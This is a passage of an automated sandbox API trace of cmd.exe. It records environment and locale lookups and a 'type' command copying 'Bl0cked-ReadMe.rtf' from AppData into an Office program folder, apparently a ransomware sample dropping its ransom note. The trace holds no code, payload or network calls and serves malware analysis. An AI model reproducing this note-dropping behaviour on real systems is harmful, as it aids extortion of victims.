lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.042] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0152.042] GetEnvironmentVariableW (in: 
lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.042] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.042] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.042] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0152.042] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0152.042] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0152.042] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0152.042] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0152.042] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0152.042] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0152.042] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0152.042] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0152.043] GetEnvironmentStringsW () returned 0x472300* [0152.043] FreeEnvironmentStringsW (penv=0x472300) returned 1 [0152.043] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.043] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.043] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0152.043] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0152.043] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0152.043] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0152.043] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0152.043] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0152.043] _wcsicmp 
(_String1="KEYS", _String2="RANDOM") returned -7 [0152.043] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.043] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfb18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfb18, lpFilePart=0x2cfb14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfb14*="Desktop") returned 0x18 [0152.043] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.043] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf894 | out: lpFindFileData=0x2cf894) returned 0x470040 [0152.044] FindClose (in: hFindFile=0x470040 | out: hFindFile=0x470040) returned 1 [0152.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf894 | out: lpFindFileData=0x2cf894) returned 0x470040 [0152.044] FindClose (in: hFindFile=0x470040 | out: hFindFile=0x470040) returned 1 [0152.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf894 | out: lpFindFileData=0x2cf894) returned 0x470040 [0152.044] FindClose (in: hFindFile=0x470040 | out: hFindFile=0x470040) returned 1 [0152.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.044] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.044] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.044] GetEnvironmentStringsW () returned 0x472b20* [0152.044] FreeEnvironmentStringsW (penv=0x472b20) returned 1 [0152.044] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.045] GetConsoleOutputCP () returned 0x1b5 [0152.045] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.045] GetUserDefaultLCID () returned 0x409 [0152.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfc58, cchData=128 | out: lpLCData="0") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfc58, cchData=128 | out: lpLCData="0") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfc58, cchData=128 | out: lpLCData="1") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.046] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.047] GetConsoleTitleW (in: lpConsoleTitle=0x460900, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.047] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.047] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.047] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.048] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.048] _wcsicmp (_String1="type", _String2=")") returned 75 [0152.048] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0152.048] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0152.048] _wcsicmp (_String1="IF", _String2="type") returned -11 [0152.048] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0152.048] _wcsicmp (_String1="REM", _String2="type") returned -2 [0152.049] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0152.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.053] GetFileType (hFile=0x7) returned 0x2 [0152.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.172] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cfb50 | out: lpMode=0x2cfb50) returned 1 [0152.172] _dup (_FileHandle=1) returned 3 [0152.172] _close (_FileHandle=1) returned 0 [0152.173] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0152.173] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cfb20, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0152.174] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0152.174] GetConsoleTitleW (in: lpConsoleTitle=0x2cf950, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.174] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0152.174] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0152.174] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0152.175] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0152.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.176] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf4b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf4b4) returned 0x460eb0 [0152.176] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0152.176] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0152.176] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0152.176] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce3c0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0152.176] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0152.176] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.176] GetFileType (hFile=0x54) returned 0x1 [0152.176] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.176] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce418 | out: lpFileSizeHigh=0x2ce418*=0x0) returned 0x1632 [0152.176] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.176] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.177] _get_osfhandle (_FileHandle=4) returned 0x54 
[0152.177] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.178] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.178] GetFileType (hFile=0x4c) returned 0x1 [0152.178] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.178] GetFileType (hFile=0x4c) returned 0x1 [0152.178] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.178] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] GetFileType (hFile=0x4c) returned 0x1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] GetFileType (hFile=0x4c) returned 0x1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 
0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.180] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.180] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, 
lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, 
lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.182] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.182] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.183] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.183] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0152.183] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] 
GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.184] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.184] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | 
